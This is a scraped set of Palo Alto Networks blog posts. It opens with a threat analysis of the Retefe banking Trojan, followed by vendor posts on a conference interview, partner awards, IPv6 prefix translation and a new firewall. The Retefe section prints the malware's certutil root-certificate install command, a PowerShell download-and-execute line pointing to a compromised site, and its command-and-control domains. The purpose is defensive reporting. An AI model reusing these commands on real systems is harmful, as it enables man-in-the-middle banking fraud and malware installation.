Retefe Banking Trojan Targets Sweden, Switzerland and Japan

Retefe is one of the most targeted banking Trojans currently in the wild. While other families such as Zeus and Citadel are widely adopted by attackers targeting banking websites around the world, Retefe is consistently used to target victims in Sweden, Switzerland and Japan.

In the last two weeks we have detected a surge of e-mails using AutoFocus, each carrying the Retefe Trojan and targeting organizations in Western Europe and Japan.

Figure 1: AutoFocus map of recent Retefe Trojan recipients

The attack e-mails are using a variety of “order” and “receipt” themes, each tailored to the country they are targeting and using dated file names to make them appear more relevant. The e-mails most often claim to be from a local electronics retailer.

Figure 2: Retefe sample delivered to Swedish target.

On a global scale, Retefe is a rather small threat, but that appears to be by design. The malware hijacks connections to Swiss, Swedish and Japanese financial institutions to assist the attacker in committing fraud. The malware carried in the most recent campaigns also downloads and installs the Smoke Loader Trojan, which is a modular backdoor capable of stealing credentials and installing additional malware.

Retefe Behavior

Retefe is different from most banking Trojans, which typically attack web browser software to capture login credentials before they are encrypted with SSL and sent to the bank’s web server. Instead, Retefe uses the Windows PowerShell to execute a series of commands that installs a new root certificate on the system and a proxy configuration to re-route the traffic to the targeted banking websites.

The Retefe Trojan writes the root certificate to the disk and then uses the following command to install it on the sytem.

certutil -addstore -f -user ROOT ProgramData\cert512121.der

Retefe has used many certificates in the past, but the latest one is a fake “thawte Inc.” certificate.

Figure 3:  Fake “thawte, Inc.” Root Certificate installed by Retefe.

After installing the certificate, Retefe makes a request to a server over HTTPS to retrieve JavaScript code that will reconfigure the system proxy for web browsing to route traffic for specific banking domains through a server controlled by the attacker.  The proxy server performs a man-in-the-middle attack against the traffic, decrypting and possibly modifying the request before re-encrypting the data and passing it on to the bank. Retefe installs the new root certificate to prevent users from receiving a notification that the website they are contacting should not be trusted.

The Retefe command and control server appears to only return this proxy configuration code if the infected host is located in Switzerland, Sweden or Japan. Retefe changes command and control servers frequently, but the most recent campaigns use domains that mimic the names of VPN services, including:

  • securevpnalarm.net
  • hsshvpn.net

After installing the certificate and reconfiguring the system proxy, Retefe uses another PowerShell command to download an additional executable. In many cases we have identified this malware as a variant of Smoke Loader, a modular backdoor Trojan capable of stealing credentials from the infected system.

Retefe variants download additional malware from multiple URLs, but in most cases the server hosting the executable is a compromised website hosted in the country being targeted by the sample. Below is one example of the PowerShell script that initiates the download and executes it.

powershell.exe -Command (New-Object System.Net.WebClient).DownloadFile(‘http://www.schweizerhof-wetzikon[.]ch/images/rtucrtmirumctrutbitueriumxe/ivotyimoyctorieotcmir.exe’ ‘ProgramData\Microsoft-KB512118.exe’);(New-Object -com Shell.Application).ShellExecute(‘ProgramData\Microsoft-KB512118.exe’);

We suspect the actors behind Retefe began downloading Smoke Loader to help monetize infection of systems outside of their three targeted nations.

Conclusion

While Retefe’s distribution is small on a global scale, its attacks are specifically targeted at online banking customers in just a few countries. The most recent campaign shows that Retefe may also threaten users in other countries as they begin using their infections to install additional malware.

Palo Alto Networks WildFire identifies Retefe and Smoke Loader samples as malicious and AutoFocus users can identify these samples using the SmokeLoader and Retefe tags.

, , , and

[Palo Alto Networks Blog]

Security Goes Beyond the Firewall

Palo Alto Networks was at the Gartner Security & Risk Management Summit in Brazil last week, and while we were there, Arthur Capella, Palo Alto Networks Country Manager – Brazil, spoke with Bit Magazine on how our next-generation firewall technology detects and spreads the knowledge of new threats, creating a network of effective corporate protection.

Capella also touched on the idea of good technology practices, and how instead of completely banning the use of applications, employers should manage in an intelligent and responsible way to maximize employee productivity without compromising security.

Watch the full interview – in Portuguese – below:

http://bit.itweb.tv/embed/236/?

While you’re here, take a look at some of the pictures we captured from the event:

Chad Berndtson

[Palo Alto Networks Blog]

Recognizing the Best of the Best

Earlier this week Mark Anderson and I had the distinct honor of unveiling our five Global Partner Award Winners as part of our FY16 Sales Kickoff.

This year’s Sales Kickoff was a milestone event for us as this was the first time in our company’s history that we invited partners from around the world to join our Sales Kickoff Meeting. The reason is simple, partners are not an extension of our global salesforce…they are an integral part of it.

Recognizing the best of the best is a global activity that has stood the test of time. Whether you are reaching back in history to the early days of competition and the quest for Olympic Gold or you are talking about today’s modern business world, teams and individuals are working hard to earn the prestigious honor of being recognized as the best.

And, when you are competing in a partner ecosystem that had 481 partners grow more than 100% year-over-year these awards truly recognize the best of the best, which is why I wanted to highlight them in this blog post.

We recognized five partners for their superior performance in the following areas: year-over-year growth, enablement, joint planning and services capabilities. And the winners were:

Americas Partner of the Year: Optiv

Accepting the award is Dan Wilson, Executive Vice President of Partner Strategy

APAC Partner of the Year: Telstra

Accepting the award is Euan Prentice, Director of Services Business Development

EMEA Partner of the Year: Dimension Data

Accepting the awards is Chris Jenkins, General Manager Security, Europe

Global Distribution Partner of the Year: Westcon Group

Accepting the award is Bill Corbin, Executive Vice President, Global Partner Management and Business Development

Japan Partner of the Year: Techmatrix

Accepting the award is Takaharu Yai, Director Senior Operating Officer General Manager

I want to thank all 548 partners from around the world that joined us in Las Vegas this week. Palo Alto Networks wouldn’t be the company it is today without you, but more importantly we can’t succeed in the future without you.

Let’s accelerate together in FY16.

Ron

[Palo Alto Networks Blog]

Getting the Most Out of IPv6

What is NPTv6?

IPv6-to-IPv6 Network Prefix Translation (NPTv6) performs a stateless, static translation of one IPv6 prefix to another IPv6 prefix (port numbers are not changed). NPTv6 for IPv6 addresses is similar to NAT for IPv4 addresses. However, NPTv6 does not translate an entire IPv6 address; it translates only the prefix portion of the address. The host portion of the address is untranslated and therefore remains the same on either side of the firewall.

Why Would I Translate IPv6 Prefixes When IPv6 Addresses Are So Abundant?

With the limited addresses in the IPv4 space, NAT was required to translate private, non-routable IPv4 addresses to one or more globally-routable IPv4 addresses. But in the case of IPv6, the reason to translate prefixes is not due to a dearth of addresses. You might want to use NPTv6 to translate IPv6 prefixes for the following reasons:

  • You can prevent the asymmetrical routing problems that result from Provider Independent addresses being advertised from multiple data centers. Asymmetric routing can occur if a Provider Independent address space (/48, for example) is advertised by multiple data centers to the global Internet. By using NPTv6, you can advertise more specific routes from regional firewalls, and the return traffic will arrive at the same firewall where the source IP address was translated by the translator.
  • Private and public addresses are independent; you can change one without affecting the other. That is, you need not change the IPv6 prefixes used inside your local network if the global prefixes are changed (for example, by an ISP or as a result of merging organizations). Conversely, you can change the inside addresses at will without disrupting the addresses that are used to access services in the private network from the Internet. In either case, you update a NAT rule rather than reassign network addresses.
  • You have the ability to translate Unique Local Addresses to globally routable addresses. Thus, you have the convenience of private addressing and the functionality of translated, routable addresses.
  • Your IPv6 prefixes are less exposed than if you didn’t translated network prefixes. However, NPTv6 does not provide security; you must set up firewall security policies correctly in each direction to ensure that traffic is controlled as you intended.

See more information on NPTv6 in the PAN-OS 7.0 Administrator’s Guide.

[Palo Alto Networks Blog]

The New PA-7080: Delivering Breach Prevention at Scale

Today we announced the release of our highest-end firewall, the PA-7080. It is pretty common in our industry for vendors to come out with a new bigger chassis with more speeds and feeds. So why is the PA-7080 big news and why is it important?

There is a yawning gap between what large enterprises, cloud providers and telecom service providers need in order to meet their security challenges and the capability of the technologies they have in place today. The basic limitations of those technologies create that gap.

Traditional firewall vendors have focused their efforts on building faster and bigger chassis firewalls but have missed the bigger picture. Their concept of security and scale is confined to how many packets per second their device can process in the course of making traffic decisions based on port, protocol and IP address. While these devices can certainly pass traffic, they arenot adding value. They fail to identify and control applications, fail to detect threats and fail to provide an automated closed loop response that actually prevents successful attacks. In effect, they are passively passing traffic, making security decisions at a layer in the protocol stack that is irrelevant to the modern threats on large-scale networks.

Attempts to address this problem by adding “firewall helpers” in the network or adding full traffic security into old chassis firewalls have not worked.  The performance impacts and operational hurdles are too great and ultimately do not add much security value. As a result, our largest and most critically important networks have the least effective security. This is why the PA-7080 is so important.

The PA-7080 architecture provides a prevention capability that scales not just speeds and feeds, but in the ability to control applications, to identify threats and deliver real time automated response.  Combining power, intelligence and simplicity it gives large enterprises and service providers a security capability that is relevant to threats they face — without compromising the performance integrity of their networks, data centers and cloud infrastructure.

Our engineers made a lot of thoughtful and clever design decisions to make the PA-7080 ideally suited for operation in service provider and large enterprise environments.

For more

[Palo Alto Networks Blog]

English
Exit mobile version